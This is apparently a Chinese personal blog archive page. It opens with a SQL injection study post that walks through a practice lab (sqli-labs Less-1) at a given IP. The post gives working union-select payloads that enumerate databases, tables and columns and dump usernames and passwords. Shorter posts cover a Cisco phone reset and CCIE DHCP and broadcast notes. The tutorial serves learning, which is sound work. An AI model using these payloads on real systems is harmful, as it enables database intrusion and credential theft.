生活琐事 - Fantasy
分类 "生活琐事" 的存档.

PTE-SQL注入

2023年10月8日
{ 没有评论 }

第一章 SQL注入

1、找寻注入点

2、判断注入类型

a.数字型 b.字符型

http://49.235.78.245:1111/Less-1/?id=1 and 1=1

http://49.235.78.245:1111/Less-1/?id=1 and 1=2

看看是否正常,如果都正常,说明a—nd后面的1=1,1=2没有生效。说明是字符型注入,有闭合。

3、判断闭合方式

字符型注入闭合方式:‘ ” ) ‘) “) % %)

注释方法: %23 –+ # %00

http://49.235.78.245:1111/Less-1/?id=1 and 1=1 %23 #显示查询结果

http://49.235.78.245:1111/Less-1/?id=1 and 1=2 %23 #不显示查询结果

说明闭合方式为 : ‘

4、判断列数 (order by

order by 排序函数 参数大于实际列数时,会报错。 以此来判断列数

http://49.235.78.245:1111/Less-1/?id=1′ order by 3 %23

5、联合查询 union selcet

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,2,3 %23

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,database(),version() %23

通过显示情况判断回显位置。

MySQL 常用表

information_schema.schemata #存储数据库中所有数据库的库名

information_schema.tables #存储数据库中所有数据表的表名

information_schema.columns #存储数据库中所有列的列名

常用字段

table_schema #数据库名称

table_name #数据表名称

column_name #列名称

依次查询:

查询所有库名

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,group_concat(schema_name),3 from information_schema.schemata %23

查询所有表名

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’security’ %23

查询列名称

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=”users” %23

查询结果

http://49.235.78.245:1111/Less-1/?id=-2′ union select 1,group_concat(“@”, id,”:”,username,”:”,password,”@”),3 from users %23

阅读更多…
生活琐事

2017·开篇

2017年2月22日
{ 没有评论 }

2017年,不知不觉过了2个月,新的一年,应该有新的目标,目标已经设定好,重要的目标在心里默念三遍,希望新的一年目标和愿望都可以实现。

生活琐事

时光

2016年3月11日
{ 2 条评论 }

诗

生活琐事

cisco 7941 ip电话重置方法

2011年8月24日
{ 没有评论 }

1.将电话上电源线(或网线)拔下。
2.插上电源线(或网线)插上,同时按住#号键,直到显示屏旁边2个按钮灯不停闪烁。
3.此时,一次按123456789*0#,输入结束,按钮停止闪烁。
重置完成。

生活琐事 ,

CCIE的feature知识点整理

2011年6月2日
{ 没有评论 }

directed-broadcast  定向广播

  默认,路由器丢弃广播 
  但有些应用需要路由器转发广播,例如:DHCP服务器在远程网络
 接口上手工开启转发广播的功能
    accesslist 10 permit any
    interface f0/0
    ip directed-broadcast 10
  
 
 广播转发到哪里呢?
   例子:本地10.1.1.0/24  广播为10.255.255.255  , DHCP服务器地址 192.168.1.100/24
    
dhcp服务器网段的广播地址为192.168.1.255   ,所以要在接口上定义 转发到哪里
 
  单播转发给DHCP服务器
     intface f0/0
       ip helper-address 192.168.1.100

 *接口默认只转发通过的协议  (没有的协议默认不转发,自己加协议和端口号)
     TFTP 69    DNS 53      TS 37  NNS 137 NDS 138  BPCSD67 68  TS 49

   R1(config)ip forward-protocol udp 3001

————————————————————————————
DHCP
   windows主机使用DHCP获取地址时: 先发一个广播,等待1秒没应答,发送第二个,等9秒无应答发送第三个,
等待13秒无应答发送最后一个,等待16秒后,四个广播包都没应答,放弃请求
网卡自动配一个私有IP(169.254.0.0/16网段),网卡图标黄色感叹号(受限制连接),此时出现DHCP服务器也救不
了这台主机
   CISCO做DHCP客户端,会一直等待。直到出现DHCP服务器分一个IP, 有使用限制的,租约时间。时间过去一半时
续约,续约不成的话,75%再续约,还不成就放弃使用此地址

     
  配置    R1—–R2
    R2(config)service dhcp
                ip dhcp pool ccie1
                network 10.1.1.0 255.255.255.0      可供客户使用的地址段                            
                default-router 10.1.1.1             网关               
                dns-server 10.1.1.1 10.1.1.2        DNS
                ip dhcp excluded-address 10.1.1.1 10.1.1.10 移除10.1.1.1到10.1.1.10的地址
                lease 1 1 1                         租约1天1小时1分钟
      阅读更多…

生活琐事
上一页
watch glee episodes joomla themes Wordpress主题站 templates2joomla